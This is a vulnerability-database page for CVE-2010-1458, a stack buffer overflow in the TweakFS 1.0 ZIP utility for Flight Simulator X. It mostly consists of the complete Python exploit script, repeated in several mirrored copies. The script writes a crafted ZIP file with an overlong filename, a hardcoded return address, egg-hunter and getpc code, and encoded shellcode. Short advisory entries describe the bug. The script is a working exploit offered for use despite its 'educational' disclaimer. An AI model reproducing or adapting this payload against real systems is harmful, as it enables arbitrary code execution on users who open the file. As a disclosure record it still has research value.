Search...

TweakFS 1.0 Stack Buffer Overflow

2010-04-20T00:00:00

ID PACKETSTORM:88670
Type packetstorm
Reporter corelanc0d3r
Modified 2010-04-20T00:00:00

Description

                                        
                                            `# Exploit Title : TweakFS 1.0 (FSX Edition)  
# CVE : CVE-2010-1458  
# Corelan : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-026  
# Date : April 7th, 2010  
# Author : corelanc0d3r  
# Bug found by : TecR0c  
# Software Link : http://tweakfs.com/download/tweakfs_zip_fsx.zip  
# Version : 1.0  
# OS : Windows  
# Tested on : XP SP3 En (VirtualBox)  
# Type of vuln : Direct RET / SEH  
# Greetz to : Corelan Security Team  
# http://www.corelan.be:8800/index.php/security/corelan-team-members/  
#  
# Script provided 'as is', without any warranty.  
# Use for educational purposes only.  
# Do not use this code to do anything illegal !  
# Corelan does not want anyone to use this script  
# for malicious and/or illegal purposes.  
# Corelan cannot be held responsible for any illegal use.  
#  
# Note : you are not allowed to edit/modify this code.   
# If you do, Corelan cannot be held responsible for any damages this may cause.  
#  
#  
# Code :  
print "|------------------------------------------------------------------|"  
print "| __ __ |"  
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |"  
print "| / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\ / __/ _ \\/ __ `/ __ `__ \\ |"  
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |"  
print "| \\___/\\____/_/ \\___/_/\\__,_/_/ /_/ \\__/\\___/\\__,_/_/ /_/ /_/ |"  
print "| |"  
print "| http://www.corelan.be:8800 |"  
print "| |"  
print "|-------------------------------------------------[ EIP Hunters ]--|\n"  
print " [+] Exploit for TweakFS 1.0 - only works on XP SP3";  
print " [+] Preparing payload..."  
ldf_header = ("\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"  
"\x00\x00\x00\x00\x00\x00\x00\x00"  
"\xe4\x0f"  
"\x00\x00\x00")  
  
cdf_header = ("\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00"  
"\xe4\x0f"  
"\x00\x00\x00\x00\x00\x00\x01\x00"  
"\x24\x00\x00\x00\x00\x00\x00\x00")  
  
eofcdf_header = ("\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"  
"\x12\x10\x00\x00"   
"\x02\x10\x00\x00"   
"\x00\x00")  
  
#egg esi, will jump to edi  
egg = "VYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"  
egg += "avMQzjioDOW2PRqzERCh8MVNGLC51J0tJOLxpwDptpQdlKXzloaeKZnO45IwkOM7A"  
getpc="\x89\x05\x5e\x98\x99\x46\x46\x8a\x94\x98\x98\x98"  
getpc += "\x74\x07\x46\x46\x49\x73\x97" #loop  
getpc += "\x77\x85" #jump before getpc  
getpc += "\x46\x41\x41\x41" #nops  
nop="\x42\x42\x33\x90\x41\x41\x41\x41\x41\x41" #nops + prepare loop  
size=272  
  
ret = "\x7C\x22\x48\x7E" # 0x7E48227C user32.dll XP SP3  
buff = "\x41" * (125-len(nop))  
buff += nop + getpc + egg + "\x77\x9F" #jmp between getpc and egg  
buff += "\x41" * (size-len(buff))  
buff += ret  
buff += "\x41\x77\xA4\x42" #jump back  
buff += "\x3c\x44\x40\x00" # null byte to avoid writing over end of stack (no SEH)  
buff += "w00tw00t"  
#edi basereg - MessageBox shellcode  
buff += "WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIyIHkmKzyt4utzTt"  
buff += "qXRmbBZFQhIRDnkqavPLKqfdLNkrV7lNk1VwxLKSNQ0NkDvTxpOdXrUl3SiVa8QyoM1"  
buff += "1pNkRLwTDdlKQUwLnksdS5d8Wq8jnkQZwhLKQJq05QjKM3egQYnkVTLK31JNUaIoVQY"  
buff += "PKLNLK4O0cDfjKq8OVmUQIWyyHqKOYokOUkalgTdhSEyNnkBz5tVaJK2FNkTLPKLKrz"  
buff += "GlUQZKNkUTNkUQzHnipDwTUL3QKsoBwx5yXTNixeMYhBSXNnpNVnxlbrYxOlKOkOKOK"  
buff += "9qUwtMk3NxXM2rSNgWlgT2rixlKkOkOYoK9pEeXqx2LrLupYo58wC026Natph0u2SSU"  
buff += "proxSlWTDJLIXfrvkORuWtoyhBRpMkMxLbrmOLMWgl14v2yxcnkOKOKOaxRlQQrnQHQ"  
buff += "xBc2orrsutqKkMXQLq4uWMYKSsXprV8gPupPhpcFPsTecQxu5bLaq0nCXEpqs0oBR1x"  
buff += "cTepqrRY3XPopwbNSUvQ9Yk8pLWTWeMYyqdqzrBrV3saPRyozpTqo0rpKO1EUXA"  
buff += "\x43" * (4064-len(buff)) # 4064  
buff += ".txt"  
  
  
print " [+] Writing payload to file corelanc0d3r_tweakfs.zip"  
mefile = open('corelanc0d3r_tweakfs.zip','w');  
mefile.write(ldf_header + buff + cdf_header + buff + eofcdf_header);  
mefile.close()  
print " [+] Wrote " + str(len(buff))+ " bytes to file"  
`

JSON Vulners Source

Initial Source

{"reporter": "corelanc0d3r", "enchantments": {"score": {"value": 9.1, "vector": "NONE", "modified": "2016-12-05T22:11:34"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2010-1458"]}, {"type": "saint", "idList": ["SAINT:4F99F60DD629C526E3DFB542329DB2B5", "SAINT:105EBB16924CB02164DDF6301CE70434", "SAINT:F8453FBB6FA9B98A6A0CDEB20E641EAC"]}, {"type": "seebug", "idList": ["SSV:68357"]}, {"type": "exploitdb", "idList": ["EDB-ID:12293"]}], "modified": "2016-12-05T22:11:34"}, "vulnersScore": 9.1}, "published": "2010-04-20T00:00:00", "lastseen": "2016-12-05T22:11:34", "cvelist": ["CVE-2010-1458"], "id": "PACKETSTORM:88670", "sourceHref": "https://packetstormsecurity.com/files/download/88670/corelanc0d3r_tweakfs_sploit.py.txt", "objectVersion": "1.2", "sourceData": "`# Exploit Title : TweakFS 1.0 (FSX Edition) \n# CVE : CVE-2010-1458 \n# Corelan : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-026 \n# Date : April 7th, 2010 \n# Author : corelanc0d3r \n# Bug found by : TecR0c \n# Software Link : http://tweakfs.com/download/tweakfs_zip_fsx.zip \n# Version : 1.0 \n# OS : Windows \n# Tested on : XP SP3 En (VirtualBox) \n# Type of vuln : Direct RET / SEH \n# Greetz to : Corelan Security Team \n# http://www.corelan.be:8800/index.php/security/corelan-team-members/ \n# \n# Script provided 'as is', without any warranty. \n# Use for educational purposes only. \n# Do not use this code to do anything illegal ! \n# Corelan does not want anyone to use this script \n# for malicious and/or illegal purposes. \n# Corelan cannot be held responsible for any illegal use. \n# \n# Note : you are not allowed to edit/modify this code. \n# If you do, Corelan cannot be held responsible for any damages this may cause. \n# \n# \n# Code : \nprint \"|------------------------------------------------------------------|\" \nprint \"| __ __ |\" \nprint \"| _________ ________ / /___ _____ / /____ ____ _____ ___ |\" \nprint \"| / ___/ __ \\\\/ ___/ _ \\\\/ / __ `/ __ \\\\ / __/ _ \\\\/ __ `/ __ `__ \\\\ |\" \nprint \"| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\" \nprint \"| \\\\___/\\\\____/_/ \\\\___/_/\\\\__,_/_/ /_/ \\\\__/\\\\___/\\\\__,_/_/ /_/ /_/ |\" \nprint \"| |\" \nprint \"| http://www.corelan.be:8800 |\" \nprint \"| |\" \nprint \"|-------------------------------------------------[ EIP Hunters ]--|\\n\" \nprint \" [+] Exploit for TweakFS 1.0 - only works on XP SP3\"; \nprint \" [+] Preparing payload...\" \nldf_header = (\"\\x50\\x4B\\x03\\x04\\x14\\x00\\x00\\x00\\x00\\x00\\xB7\\xAC\\xCE\\x34\\x00\\x00\\x00\" \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" \n\"\\xe4\\x0f\" \n\"\\x00\\x00\\x00\") \n \ncdf_header = (\"\\x50\\x4B\\x01\\x02\\x14\\x00\\x14\\x00\\x00\\x00\\x00\\x00\\xB7\\xAC\\xCE\\x34\\x00\\x00\\x00\" \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" \n\"\\xe4\\x0f\" \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\" \n\"\\x24\\x00\\x00\\x00\\x00\\x00\\x00\\x00\") \n \neofcdf_header = (\"\\x50\\x4B\\x05\\x06\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x00\" \n\"\\x12\\x10\\x00\\x00\" \n\"\\x02\\x10\\x00\\x00\" \n\"\\x00\\x00\") \n \n#egg esi, will jump to edi \negg = \"VYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI\" \negg += \"avMQzjioDOW2PRqzERCh8MVNGLC51J0tJOLxpwDptpQdlKXzloaeKZnO45IwkOM7A\" \ngetpc=\"\\x89\\x05\\x5e\\x98\\x99\\x46\\x46\\x8a\\x94\\x98\\x98\\x98\" \ngetpc += \"\\x74\\x07\\x46\\x46\\x49\\x73\\x97\" #loop \ngetpc += \"\\x77\\x85\" #jump before getpc \ngetpc += \"\\x46\\x41\\x41\\x41\" #nops \nnop=\"\\x42\\x42\\x33\\x90\\x41\\x41\\x41\\x41\\x41\\x41\" #nops + prepare loop \nsize=272 \n \nret = \"\\x7C\\x22\\x48\\x7E\" # 0x7E48227C user32.dll XP SP3 \nbuff = \"\\x41\" * (125-len(nop)) \nbuff += nop + getpc + egg + \"\\x77\\x9F\" #jmp between getpc and egg \nbuff += \"\\x41\" * (size-len(buff)) \nbuff += ret \nbuff += \"\\x41\\x77\\xA4\\x42\" #jump back \nbuff += \"\\x3c\\x44\\x40\\x00\" # null byte to avoid writing over end of stack (no SEH) \nbuff += \"w00tw00t\" \n#edi basereg - MessageBox shellcode \nbuff += \"WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIyIHkmKzyt4utzTt\" \nbuff += \"qXRmbBZFQhIRDnkqavPLKqfdLNkrV7lNk1VwxLKSNQ0NkDvTxpOdXrUl3SiVa8QyoM1\" \nbuff += \"1pNkRLwTDdlKQUwLnksdS5d8Wq8jnkQZwhLKQJq05QjKM3egQYnkVTLK31JNUaIoVQY\" \nbuff += \"PKLNLK4O0cDfjKq8OVmUQIWyyHqKOYokOUkalgTdhSEyNnkBz5tVaJK2FNkTLPKLKrz\" \nbuff += \"GlUQZKNkUTNkUQzHnipDwTUL3QKsoBwx5yXTNixeMYhBSXNnpNVnxlbrYxOlKOkOKOK\" \nbuff += \"9qUwtMk3NxXM2rSNgWlgT2rixlKkOkOYoK9pEeXqx2LrLupYo58wC026Natph0u2SSU\" \nbuff += \"proxSlWTDJLIXfrvkORuWtoyhBRpMkMxLbrmOLMWgl14v2yxcnkOKOKOaxRlQQrnQHQ\" \nbuff += \"xBc2orrsutqKkMXQLq4uWMYKSsXprV8gPupPhpcFPsTecQxu5bLaq0nCXEpqs0oBR1x\" \nbuff += \"cTepqrRY3XPopwbNSUvQ9Yk8pLWTWeMYyqdqzrBrV3saPRyozpTqo0rpKO1EUXA\" \nbuff += \"\\x43\" * (4064-len(buff)) # 4064 \nbuff += \".txt\" \n \n \nprint \" [+] Writing payload to file corelanc0d3r_tweakfs.zip\" \nmefile = open('corelanc0d3r_tweakfs.zip','w'); \nmefile.write(ldf_header + buff + cdf_header + buff + eofcdf_header); \nmefile.close() \nprint \" [+] Wrote \" + str(len(buff))+ \" bytes to file\" \n`\n", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 6.8}, "description": "", "references": [], "hash": "9d8c806c7715958a59513e952be4e3aab76797b879884d21b577a41445349fe5", "edition": 1, "title": "TweakFS 1.0 Stack Buffer Overflow", "type": "packetstorm", "modified": "2010-04-20T00:00:00", "history": [], "bulletinFamily": "exploit", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "fe0aae2c416335693d170b32dff4f15f", "key": "cvelist"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "e178d9305e7253bd9f3bcbb4594845f9", "key": "href"}, {"hash": "e9b31838614598f5e8d84c3e324edec8", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "e9b31838614598f5e8d84c3e324edec8", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "5dab027692baf2e26c944518885cfa86", "key": "reporter"}, {"hash": "e6311dc39d69fd014ae1d0cbd01c5aec", "key": "sourceData"}, {"hash": "a2acb891a31645f6ab78cf9d1a6844d0", "key": "sourceHref"}, {"hash": "55dae3022f0ddbfb6075893289c9ee1d", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}], "href": "https://packetstormsecurity.com/files/88670/TweakFS-1.0-Stack-Buffer-Overflow.html", "viewCount": 1}

{"cve": [{"lastseen": "2019-05-29T18:10:27", "bulletinFamily": "NVD", "description": "Stack-based buffer overflow in Create and Extract Zips TweakFS Zip Utility 1.0 for Flight Simulator X (FSX) allows remote attackers to execute arbitrary code via a long filename in a ZIP archive.", "modified": "2017-08-17T01:32:00", "id": "CVE-2010-1458", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1458", "published": "2010-04-20T16:30:00", "title": "CVE-2010-1458", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "saint": [{"lastseen": "2019-05-29T17:19:48", "bulletinFamily": "exploit", "description": "Added: 06/24/2010 \nCVE: [CVE-2010-1458](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1458>) \nBID: [39565](<http://www.securityfocus.com/bid/39565>) \nOSVDB: [63899](<http://www.osvdb.org/63899>) \n\n\n### Background\n\nThe [TweakFS Zip Utility](<http://www.tweakfs.com>) is included in the TweakFS Flight Simulator X Utilities. \n\n### Problem\n\nA buffer overflow vulnerability in the TweakFS Zip Utility allows command execution when a user opens a ZIP archive containing a long, specially crafted filename. \n\n### Resolution\n\nDo not open untrusted ZIP files using the TweakFS Zip Utility. \n\n### References\n\n<http://archives.neohapsis.com/archives/fulldisclosure/2010-04/0242.html> \n\n\n### Limitations\n\nExploit works on TweakFS Zip Utility 1.0 and requires a user to open the exploit file. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2010-06-24T00:00:00", "published": "2010-06-24T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/tweakfs_zip_filename", "id": "SAINT:4F99F60DD629C526E3DFB542329DB2B5", "type": "saint", "title": "TweakFS Zip Utility for FSX filename buffer overflow", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2016-10-03T15:01:53", "bulletinFamily": "exploit", "description": "Added: 06/24/2010 \nCVE: [CVE-2010-1458](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1458>) \nBID: [39565](<http://www.securityfocus.com/bid/39565>) \nOSVDB: [63899](<http://www.osvdb.org/63899>) \n\n\n### Background\n\nThe [TweakFS Zip Utility](<http://www.tweakfs.com>) is included in the TweakFS Flight Simulator X Utilities. \n\n### Problem\n\nA buffer overflow vulnerability in the TweakFS Zip Utility allows command execution when a user opens a ZIP archive containing a long, specially crafted filename. \n\n### Resolution\n\nDo not open untrusted ZIP files using the TweakFS Zip Utility. \n\n### References\n\n<http://archives.neohapsis.com/archives/fulldisclosure/2010-04/0242.html> \n\n\n### Limitations\n\nExploit works on TweakFS Zip Utility 1.0 and requires a user to open the exploit file. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2010-06-24T00:00:00", "published": "2010-06-24T00:00:00", "id": "SAINT:105EBB16924CB02164DDF6301CE70434", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/tweakfs_zip_filename", "type": "saint", "title": "TweakFS Zip Utility for FSX filename buffer overflow", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-06-04T23:19:31", "bulletinFamily": "exploit", "description": "Added: 06/24/2010 \nCVE: [CVE-2010-1458](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1458>) \nBID: [39565](<http://www.securityfocus.com/bid/39565>) \nOSVDB: [63899](<http://www.osvdb.org/63899>) \n\n\n### Background\n\nThe [TweakFS Zip Utility](<http://www.tweakfs.com>) is included in the TweakFS Flight Simulator X Utilities. \n\n### Problem\n\nA buffer overflow vulnerability in the TweakFS Zip Utility allows command execution when a user opens a ZIP archive containing a long, specially crafted filename. \n\n### Resolution\n\nDo not open untrusted ZIP files using the TweakFS Zip Utility. \n\n### References\n\n<http://archives.neohapsis.com/archives/fulldisclosure/2010-04/0242.html> \n\n\n### Limitations\n\nExploit works on TweakFS Zip Utility 1.0 and requires a user to open the exploit file. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2010-06-24T00:00:00", "published": "2010-06-24T00:00:00", "id": "SAINT:F8453FBB6FA9B98A6A0CDEB20E641EAC", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/tweakfs_zip_filename", "title": "TweakFS Zip Utility for FSX filename buffer overflow", "type": "saint", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T13:25:06", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-68357", "id": "SSV:68357", "title": "TweakFS 1.0 (FSX Edition) Stack buffer overflow", "type": "seebug", "sourceData": "\n # Exploit Title : TweakFS 1.0 (FSX Edition)\r\n# CVE : CVE-2010-1458\r\n# Corelan : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-026\r\n# Date : April 7th, 2010\r\n# Author : corelanc0d3r\r\n# Bug found by : TecR0c\r\n# Software Link : http://tweakfs.com/\r\n# Version : 1.0\r\n# OS : Windows\r\n# Tested on : XP SP3 En (VirtualBox)\r\n# Type of vuln : Direct RET / SEH\r\n# Greetz to : Corelan Security Team\r\n# http://www.corelan.be:8800/index.php/security/corelan-team-members/\r\n#\r\n# Script provided 'as is', without any warranty.\r\n# Use for educational purposes only.\r\n# Do not use this code to do anything illegal !\r\n# Corelan does not want anyone to use this script\r\n# for malicious and/or illegal purposes.\r\n# Corelan cannot be held responsible for any illegal use.\r\n#\r\n# Note : you are not allowed to edit/modify this code. \r\n# If you do, Corelan cannot be held responsible for any damages this may cause.\r\n#\r\n#\r\n# Code :\r\nprint "|------------------------------------------------------------------|"\r\nprint "| __ __ |"\r\nprint "| _________ ________ / /___ _____ / /____ ____ _____ ___ |"\r\nprint "| / ___/ __ \\\\/ ___/ _ \\\\/ / __ `/ __ \\\\ / __/ _ \\\\/ __ `/ __ `__ \\\\ |"\r\nprint "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |"\r\nprint "| \\\\___/\\\\____/_/ \\\\___/_/\\\\__,_/_/ /_/ \\\\__/\\\\___/\\\\__,_/_/ /_/ /_/ |"\r\nprint "| |"\r\nprint "| http://www.corelan.be:8800 |"\r\nprint "| |"\r\nprint "|-------------------------------------------------[ EIP Hunters ]--|\\n"\r\nprint " [+] Exploit for TweakFS 1.0 - only works on XP SP3";\r\nprint " [+] Preparing payload..."\r\nldf_header = ("\\x50\\x4B\\x03\\x04\\x14\\x00\\x00\\x00\\x00\\x00\\xB7\\xAC\\xCE\\x34\\x00\\x00\\x00"\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n"\\xe4\\x0f"\r\n"\\x00\\x00\\x00")\r\n\r\ncdf_header = ("\\x50\\x4B\\x01\\x02\\x14\\x00\\x14\\x00\\x00\\x00\\x00\\x00\\xB7\\xAC\\xCE\\x34\\x00\\x00\\x00"\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n"\\xe4\\x0f"\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00"\r\n"\\x24\\x00\\x00\\x00\\x00\\x00\\x00\\x00")\r\n\r\neofcdf_header = ("\\x50\\x4B\\x05\\x06\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x00"\r\n"\\x12\\x10\\x00\\x00" \r\n"\\x02\\x10\\x00\\x00" \r\n"\\x00\\x00")\r\n\r\n#egg esi, will jump to edi\r\negg = "VYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"\r\negg += "avMQzjioDOW2PRqzERCh8MVNGLC51J0tJOLxpwDptpQdlKXzloaeKZnO45IwkOM7A"\r\ngetpc="\\x89\\x05\\x5e\\x98\\x99\\x46\\x46\\x8a\\x94\\x98\\x98\\x98"\r\ngetpc += "\\x74\\x07\\x46\\x46\\x49\\x73\\x97" #loop\r\ngetpc += "\\x77\\x85" #jump before getpc\r\ngetpc += "\\x46\\x41\\x41\\x41" #nops\r\nnop="\\x42\\x42\\x33\\x90\\x41\\x41\\x41\\x41\\x41\\x41" #nops + prepare loop\r\nsize=272\r\n\r\nret = "\\x7C\\x22\\x48\\x7E" # 0x7E48227C user32.dll XP SP3\r\nbuff = "\\x41" * (125-len(nop))\r\nbuff += nop + getpc + egg + "\\x77\\x9F" #jmp between getpc and egg\r\nbuff += "\\x41" * (size-len(buff))\r\nbuff += ret\r\nbuff += "\\x41\\x77\\xA4\\x42" #jump back\r\nbuff += "\\x3c\\x44\\x40\\x00" # null byte to avoid writing over end of stack (no SEH)\r\nbuff += "w00tw00t"\r\n#edi basereg - MessageBox shellcode\r\nbuff += "WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIyIHkmKzyt4utzTt"\r\nbuff += "qXRmbBZFQhIRDnkqavPLKqfdLNkrV7lNk1VwxLKSNQ0NkDvTxpOdXrUl3SiVa8QyoM1"\r\nbuff += "1pNkRLwTDdlKQUwLnksdS5d8Wq8jnkQZwhLKQJq05QjKM3egQYnkVTLK31JNUaIoVQY"\r\nbuff += "PKLNLK4O0cDfjKq8OVmUQIWyyHqKOYokOUkalgTdhSEyNnkBz5tVaJK2FNkTLPKLKrz"\r\nbuff += "GlUQZKNkUTNkUQzHnipDwTUL3QKsoBwx5yXTNixeMYhBSXNnpNVnxlbrYxOlKOkOKOK"\r\nbuff += "9qUwtMk3NxXM2rSNgWlgT2rixlKkOkOYoK9pEeXqx2LrLupYo58wC026Natph0u2SSU"\r\nbuff += "proxSlWTDJLIXfrvkORuWtoyhBRpMkMxLbrmOLMWgl14v2yxcnkOKOKOaxRlQQrnQHQ"\r\nbuff += "xBc2orrsutqKkMXQLq4uWMYKSsXprV8gPupPhpcFPsTecQxu5bLaq0nCXEpqs0oBR1x"\r\nbuff += "cTepqrRY3XPopwbNSUvQ9Yk8pLWTWeMYyqdqzrBrV3saPRyozpTqo0rpKO1EUXA"\r\nbuff += "\\x43" * (4064-len(buff)) # 4064\r\nbuff += ".txt"\r\n\r\n\r\nprint " [+] Writing payload to file corelanc0d3r_tweakfs.zip"\r\nmefile = open('corelanc0d3r_tweakfs.zip','w');\r\nmefile.write(ldf_header + buff + cdf_header + buff + eofcdf_header);\r\nmefile.close()\r\nprint " [+] Wrote " + str(len(buff))+ " bytes to file"\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-68357", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-01T16:09:39", "bulletinFamily": "exploit", "description": "TweakFS 1.0 (FSX Edition) Stack buffer overflow. CVE-2010-1458. Local exploit for windows platform", "modified": "2010-04-19T00:00:00", "published": "2010-04-19T00:00:00", "id": "EDB-ID:12293", "href": "https://www.exploit-db.com/exploits/12293/", "type": "exploitdb", "title": "TweakFS 1.0 FSX Edition Stack Buffer Overflow", "sourceData": "# Exploit Title : TweakFS 1.0 (FSX Edition)\r\n# CVE : CVE-2010-1458\r\n# Corelan : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-026\r\n# Date : April 7th, 2010\r\n# Author : corelanc0d3r\r\n# Bug found by : TecR0c\r\n# Software Link : http://tweakfs.com/\r\n# Version : 1.0\r\n# OS : Windows\r\n# Tested on : XP SP3 En (VirtualBox)\r\n# Type of vuln : Direct RET / SEH\r\n# Greetz to : Corelan Security Team\r\n# http://www.corelan.be:8800/index.php/security/corelan-team-members/\r\n#\r\n# Script provided 'as is', without any warranty.\r\n# Use for educational purposes only.\r\n# Do not use this code to do anything illegal !\r\n# Corelan does not want anyone to use this script\r\n# for malicious and/or illegal purposes.\r\n# Corelan cannot be held responsible for any illegal use.\r\n#\r\n# Note : you are not allowed to edit/modify this code. \r\n# If you do, Corelan cannot be held responsible for any damages this may cause.\r\n#\r\n#\r\n# Code :\r\nprint \"|------------------------------------------------------------------|\"\r\nprint \"| __ __ |\"\r\nprint \"| _________ ________ / /___ _____ / /____ ____ _____ ___ |\"\r\nprint \"| / ___/ __ \\\\/ ___/ _ \\\\/ / __ `/ __ \\\\ / __/ _ \\\\/ __ `/ __ `__ \\\\ |\"\r\nprint \"| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\"\r\nprint \"| \\\\___/\\\\____/_/ \\\\___/_/\\\\__,_/_/ /_/ \\\\__/\\\\___/\\\\__,_/_/ /_/ /_/ |\"\r\nprint \"| |\"\r\nprint \"| http://www.corelan.be:8800 |\"\r\nprint \"| |\"\r\nprint \"|-------------------------------------------------[ EIP Hunters ]--|\\n\"\r\nprint \" [+] Exploit for TweakFS 1.0 - only works on XP SP3\";\r\nprint \" [+] Preparing payload...\"\r\nldf_header = (\"\\x50\\x4B\\x03\\x04\\x14\\x00\\x00\\x00\\x00\\x00\\xB7\\xAC\\xCE\\x34\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\xe4\\x0f\"\r\n\"\\x00\\x00\\x00\")\r\n\r\ncdf_header = (\"\\x50\\x4B\\x01\\x02\\x14\\x00\\x14\\x00\\x00\\x00\\x00\\x00\\xB7\\xAC\\xCE\\x34\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\xe4\\x0f\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\"\r\n\"\\x24\\x00\\x00\\x00\\x00\\x00\\x00\\x00\")\r\n\r\neofcdf_header = (\"\\x50\\x4B\\x05\\x06\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x00\"\r\n\"\\x12\\x10\\x00\\x00\" \r\n\"\\x02\\x10\\x00\\x00\" \r\n\"\\x00\\x00\")\r\n\r\n#egg esi, will jump to edi\r\negg = \"VYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI\"\r\negg += \"avMQzjioDOW2PRqzERCh8MVNGLC51J0tJOLxpwDptpQdlKXzloaeKZnO45IwkOM7A\"\r\ngetpc=\"\\x89\\x05\\x5e\\x98\\x99\\x46\\x46\\x8a\\x94\\x98\\x98\\x98\"\r\ngetpc += \"\\x74\\x07\\x46\\x46\\x49\\x73\\x97\" #loop\r\ngetpc += \"\\x77\\x85\" #jump before getpc\r\ngetpc += \"\\x46\\x41\\x41\\x41\" #nops\r\nnop=\"\\x42\\x42\\x33\\x90\\x41\\x41\\x41\\x41\\x41\\x41\" #nops + prepare loop\r\nsize=272\r\n\r\nret = \"\\x7C\\x22\\x48\\x7E\" # 0x7E48227C user32.dll XP SP3\r\nbuff = \"\\x41\" * (125-len(nop))\r\nbuff += nop + getpc + egg + \"\\x77\\x9F\" #jmp between getpc and egg\r\nbuff += \"\\x41\" * (size-len(buff))\r\nbuff += ret\r\nbuff += \"\\x41\\x77\\xA4\\x42\" #jump back\r\nbuff += \"\\x3c\\x44\\x40\\x00\" # null byte to avoid writing over end of stack (no SEH)\r\nbuff += \"w00tw00t\"\r\n#edi basereg - MessageBox shellcode\r\nbuff += \"WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIyIHkmKzyt4utzTt\"\r\nbuff += \"qXRmbBZFQhIRDnkqavPLKqfdLNkrV7lNk1VwxLKSNQ0NkDvTxpOdXrUl3SiVa8QyoM1\"\r\nbuff += \"1pNkRLwTDdlKQUwLnksdS5d8Wq8jnkQZwhLKQJq05QjKM3egQYnkVTLK31JNUaIoVQY\"\r\nbuff += \"PKLNLK4O0cDfjKq8OVmUQIWyyHqKOYokOUkalgTdhSEyNnkBz5tVaJK2FNkTLPKLKrz\"\r\nbuff += \"GlUQZKNkUTNkUQzHnipDwTUL3QKsoBwx5yXTNixeMYhBSXNnpNVnxlbrYxOlKOkOKOK\"\r\nbuff += \"9qUwtMk3NxXM2rSNgWlgT2rixlKkOkOYoK9pEeXqx2LrLupYo58wC026Natph0u2SSU\"\r\nbuff += \"proxSlWTDJLIXfrvkORuWtoyhBRpMkMxLbrmOLMWgl14v2yxcnkOKOKOaxRlQQrnQHQ\"\r\nbuff += 